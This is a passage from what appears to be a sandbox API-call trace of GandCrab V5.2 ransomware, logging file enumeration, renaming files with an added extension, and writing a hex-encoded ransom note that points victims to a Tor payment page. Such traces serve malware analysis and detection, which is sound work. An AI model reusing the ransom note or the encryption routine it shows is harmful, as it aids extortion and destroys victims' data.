4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0070.377] WriteFile (in: hFile=0x2d4, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259e590, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259e590*=0x2162, lpOverlapped=0x0) returned 1 [0070.377] CloseHandle (hObject=0x2d4) returned 1 [0070.378] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.378] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0070.378] GetSystemTime (in: lpSystemTime=0x25d0400 | out: lpSystemTime=0x25d0400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0xf, wMilliseconds=0x2bb)) [0070.378] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0070.378] GetWindowsDirectoryW (in: lpBuffer=0x2630000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0070.378] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2630200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2630600, lpMaximumComponentLength=0x2630608, lpFileSystemFlags=0x2630604, lpFileSystemNameBuffer=0x2630400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2630600*=0xd2ca4def, lpMaximumComponentLength=0x2630608*=0xff, lpFileSystemFlags=0x2630604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0070.378] wsprintfW (in: param_1=0x25d0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\d2ca4a09d2ca4deb61a.lock") returned 121 [0070.378] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\flashplayer\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x2d4 [0070.380] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.381] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.381] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\") returned 97 [0070.381] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\*" [0070.381] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\*", fInfoLevelId=0x1, lpFindFileData=0x259e5ac, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259e5ac) returned 0x503838 [0070.381] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0070.381] FindNextFileW (in: hFindFile=0x503838, lpFindFileData=0x259e5ac | out: lpFindFileData=0x259e5ac) returned 1 [0070.381] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0070.381] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0070.381] FindNextFileW (in: hFindFile=0x503838, lpFindFileData=0x259e5ac | out: lpFindFileData=0x259e5ac) returned 1 [0070.381] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2=".") returned 1 [0070.381] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2="..") returned 1 [0070.382] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\", lpString2="d2ca4a09d2ca4deb61a.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\d2ca4a09d2ca4deb61a.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\d2ca4a09d2ca4deb61a.lock" [0070.382] lstrlenW (lpString=".titwmvjl") returned 9 [0070.382] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\d2ca4a09d2ca4deb61a.lock") returned 121 [0070.382] VirtualAlloc (lpAddress=0x0, dwSize=0x132, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0070.382] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\d2ca4a09d2ca4deb61a.lock.titwmvjl") returned 130 [0070.382] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\d2ca4a09d2ca4deb61a.lock") returned 121 [0070.382] lstrlenW (lpString=".lock") returned 5 [0070.382] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0070.382] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".lock ") returned 6 [0070.382] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.382] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.382] FindNextFileW (in: hFindFile=0x503838, lpFindFileData=0x259e5ac | out: lpFindFileData=0x259e5ac) returned 1 [0070.382] lstrcmpW (lpString1="sys", lpString2=".") returned 1 [0070.382] lstrcmpW (lpString1="sys", lpString2="..") returned 1 [0070.382] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\", lpString2="sys" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys" [0070.382] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\" [0070.383] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x25d0000 [0070.383] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0070.383] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0070.383] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0070.383] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0070.383] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0070.383] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0070.383] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0070.383] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0070.383] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.384] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0070.384] wsprintfW (in: param_1=0x25d0200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\\\TITWMVJL-DECRYPT.txt") returned 122 [0070.384] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\flashplayer\\sys\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2dc [0070.384] lstrlenW (lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x7